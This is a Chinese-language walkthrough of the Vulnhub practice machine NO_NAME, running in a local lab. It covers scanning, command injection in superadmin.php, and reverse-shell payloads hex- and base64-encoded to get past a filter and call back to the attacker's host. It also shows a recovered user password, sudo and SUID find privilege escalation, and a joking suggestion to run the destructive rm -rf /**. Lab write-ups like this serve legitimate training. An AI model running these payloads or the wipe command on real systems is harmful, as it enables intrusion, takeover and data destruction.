前言
- Vulnhub刷题简单记录
NO_NAME
描述
这是一台初学者级别的机器,获得外壳有点困难,只要想开箱即用即可获得外壳。一旦获得外壳,权限提升就很容易。
这台机器有3个标志。每个标志都存在于特定用户的主目录中。准备好测试您的 Linux 技能。
初级/中级
NO_NAME开始
1、可以用两种方法确认靶场的存在,扫ip
1 | netdiscover -i eth0 -r 192.168.56.0/24 |
2、扫目标端口开发情况
1 | nmap -sV -sC 192.168.56.109 -oA R |
3、访问主页,爆破目录,指定扫描php,这里用最大的字典,发现了superadmin.php
1 | gobuster dir -u http://192.168.56.109 -w /usr/share/wordlists/dirb/big.txt -t 100 -x php |
4、在此目录发现了命令执行漏洞,通过cat查看源代码,发现过滤了一些字符,这里给出两种方法解决
1 | || cat superadmin.php |
方法一
①、首先将我们的反弹代码转换为16进制
②、利用xxd将其转换为ascii码字符,然后通过bash执行反弹成功,payload
1 | echo "62617368202d6920263e2f6465762f7463702f3139322e3136382e35362e312f3132333420303e2631"|xxd -r -p|bash |
方法二
①、将其转换为base64
1 | ||echo "YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguNTYuMS8xMjM0IDA+JjEK" |base64 -d|bash |
拿到shell之后,在home目录中找到yash的flag,提示说有一个隐藏文件
这里我们就用find来寻找yash用户创建的文件,里面藏有密码
1 | find / -name "*pass*" -type f -user yash 2>/dev/null |
找到了/usr/share/hidden/.passwd目录,发现了另一个用户的密码
1 | haclabs:haclabs1234 |
5、提权,接着发现可以无密码执行find
简单的find提权
1 | sudo find -exec /bin/bash \; |
提权方式二suid
1 | find / -perm -u=s -type f 2>/dev/null |
直接用下面命令,记得要加-p才能成功,或者直接反弹shell也行
1 | find sky -exec /bin/bash -p \; |
你如果闲的蛋疼也可以删除所有东西
1 | rm -rf /** |
我的个人博客
孤桜懶契:http://gylq.gitee.io